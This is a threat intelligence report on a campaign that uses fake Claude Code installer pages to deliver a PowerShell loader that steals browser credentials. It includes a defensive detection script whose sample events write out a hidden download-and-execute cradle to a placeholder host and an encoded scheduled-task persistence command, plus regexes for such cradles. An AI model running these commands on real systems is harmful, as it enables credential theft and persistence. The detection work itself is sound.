EXECUTIVE SUMMARY
The campaign is a targeted attack on developers through fake installation pages mimicking popular developer tools, including counterfeit Claude Code installers. These lures swap legitimate one-line installers for attacker-controlled commands, with the goal of retrieving sensitive data, including cookies, saved passwords, and payment methods, from compromised browsers. The attack has been observed targeting multiple regions, although the exact scope is unclear. The attackers' motivations appear to be financial, as they seek to exploit sensitive user information for illicit gain.
The malware infection occurs through a fake installation page that mimics the authentic installation command for Claude Code. The victim is tricked into pasting a malicious command, which retrieves an obfuscated PowerShell loader from an attacker-controlled domain. The loader then downloads and executes a native helper, which invokes the browser's Elevation Service to recover the App-Bound Encryption (ABE) key. The PowerShell stage exfiltrates decrypted cookies, passwords, and payment methods, while the native helper maintains control through a named pipe. The PowerShell loader maintains persistence through a scheduled task, which polls an attacker-controlled domain for follow-up tasks.
This threat is significant for organisations as it demonstrates a sophisticated attack chain that exploits Chrome's App-Bound Encryption (ABE) feature. The attack's use of a native helper and a PowerShell loader makes it challenging to detect and recover from, as traditional behavioural detection methods may not be effective. Organisations should take defensive actions, including enabling PowerShell Constrained Language Mode, blocking the execution of potentially obfuscated scripts, and verifying that AMSI is enabled and monitoring for AMSI tamper events. Additionally, organisations should implement MDE Web Content Filtering and require phishing-resistant MFA authentication strength for admin and developer accounts.
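The infection chain in the paragraph before last, seen from the detection side of the recommendations above: the following is an added example written for this page, not code from the report or from either referenced source. It scores constructed, Sysmon-style process and named-pipe events for the three endpoint-observable stages the chain leaves behind (a PowerShell download-and-evaluate one-liner, a native helper in a user-writable path opening a named pipe, and a scheduled task that re-runs encoded PowerShell) and attributes each hit to the PowerShell process that started it. The event field names, sample values, pipe name and installer domain are all assumptions; none of them are indicators from the report.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real logs). Sysmon numbering is used loosely:
# event_type 1 = process create, 17 = named pipe created. The installer domain,
# the helper name and the encoded string are placeholders, not report indicators.
SAMPLE_EVENTS = [
    {"event_type": 1, "pid": 100, "ppid": 10,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Stage 1: the pasted "installer" one-liner fetches and evaluates a remote script
    {"event_type": 1, "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm https://installer.example-placeholder.invalid/claude.ps1)"'},
    # Stage 2: the loader drops and runs a native helper from a user-writable path
    {"event_type": 1, "pid": 300, "ppid": 200,
     "image": r"C:\Users\dev\AppData\Local\Temp\helper.exe", "cmdline": "helper.exe"},
    # Stage 3: the helper opens a named pipe for control
    {"event_type": 17, "pid": 300,
     "image": r"C:\Users\dev\AppData\Local\Temp\helper.exe", "pipe": r"\\.\pipe\svc_ctl"},
    # Stage 4: the loader registers a scheduled task re-running encoded PowerShell
    {"event_type": 1, "pid": 400, "ppid": 200,
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 5 /tn Updater /tr "powershell -w hidden -enc SQBFAFgAIAAoAA=="'},
    # Benign activity the rules must ignore
    {"event_type": 1, "pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem"},
    {"event_type": 17, "pid": 600,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "pipe": r"\\.\pipe\chrome.sync"},
]

# Download primitives, evaluation primitives and encoded-command switches seen in cradles
DOWNLOAD_RE = re.compile(
    r"(?i)\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b")
EVAL_RE = re.compile(r"(?i)\b(iex|invoke-expression)\b")
ENCODED_RE = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+\S")
CREATE_TASK_RE = re.compile(r"(?i)/create\b")
# Directory fragments a standard user can write to (lower-cased substring match)
WRITABLE_DIRS = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\downloads\\", "\\public\\")


def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in {"powershell.exe", "pwsh.exe"}


def is_download_cradle(cmdline: str) -> bool:
    """True for a download-and-evaluate one-liner, or an encoded command hiding its body."""
    fetch_and_run = bool(DOWNLOAD_RE.search(cmdline)) and bool(EVAL_RE.search(cmdline))
    return fetch_and_run or bool(ENCODED_RE.search(cmdline))


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(d in p for d in WRITABLE_DIRS)


def analyze(events):
    """Map each PowerShell 'root' process to the set of stages attributed to it."""
    procs = {e["pid"]: e for e in events if e["event_type"] == 1}

    def root_powershell(pid):
        # Walk the parent chain to the nearest PowerShell ancestor; 'seen' guards pid-reuse loops
        seen = set()
        while pid in procs and pid not in seen:
            seen.add(pid)
            if is_powershell(procs[pid]["image"]):
                return pid
            pid = procs[pid]["ppid"]
        return None

    findings = defaultdict(set)
    for e in events:
        if e["event_type"] == 1 and is_powershell(e["image"]) and is_download_cradle(e["cmdline"]):
            findings[e["pid"]].add("cradle")
        elif (e["event_type"] == 1 and e["image"].lower().endswith("schtasks.exe")
              and CREATE_TASK_RE.search(e["cmdline"])
              and "powershell" in e["cmdline"].lower() and is_download_cradle(e["cmdline"])):
            root = root_powershell(e["ppid"])
            if root is not None:
                findings[root].add("persistence")
        elif e["event_type"] == 17 and in_user_writable(e["image"]):
            root = root_powershell(e["pid"])
            if root is not None:
                findings[root].add("helper_pipe")
    return dict(findings)


def severity(stages) -> str:
    """One stage alone is noisy; two or three stages tied to one root are actionable."""
    n = len(stages)
    return "high" if n >= 3 else "medium" if n == 2 else "low"


def report(events):
    return {pid: (severity(stages), sorted(stages)) for pid, stages in analyze(events).items()}


if __name__ == "__main__":
    for pid, (sev, stages) in report(SAMPLE_EVENTS).items():
        print(f"powershell pid {pid}: {sev} ({', '.join(stages)})")
```

The correlation step is the part worth keeping: any one rule on its own (encoded PowerShell, a scheduled task, a named pipe from a temp directory) fires on legitimate administration, but three of them hanging off the same PowerShell process is the shape of the chain described above. The `WRITABLE_DIRS` and regex lists are starting points to tune against your own telemetry, and the same root-attribution walk can be fed from Sysmon, EDR process trees or 4688/4698 events once the field names are mapped.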
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1189 | Drive-by Compromise | — |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Privilege Escalation | T1055.012 | Process Injection | Process Hollowing |
| Defense Evasion | T1027.002 | Obfuscated Files or Information | Software Packing |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Collection | T1119 | Automated Collection | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Exfiltration | T1567.001 | Exfiltration Over Web Service | Exfiltration to Code Repository |
REFERENCES:
The following reports contain further technical details:
https://www.csoonline.com/article/4169992/fake-claude-code-takes-the-ielevator-to-your-browser-secrets.html
https://www.ontinue.com/resource/blog-behind-a-fake-claude-code-installer/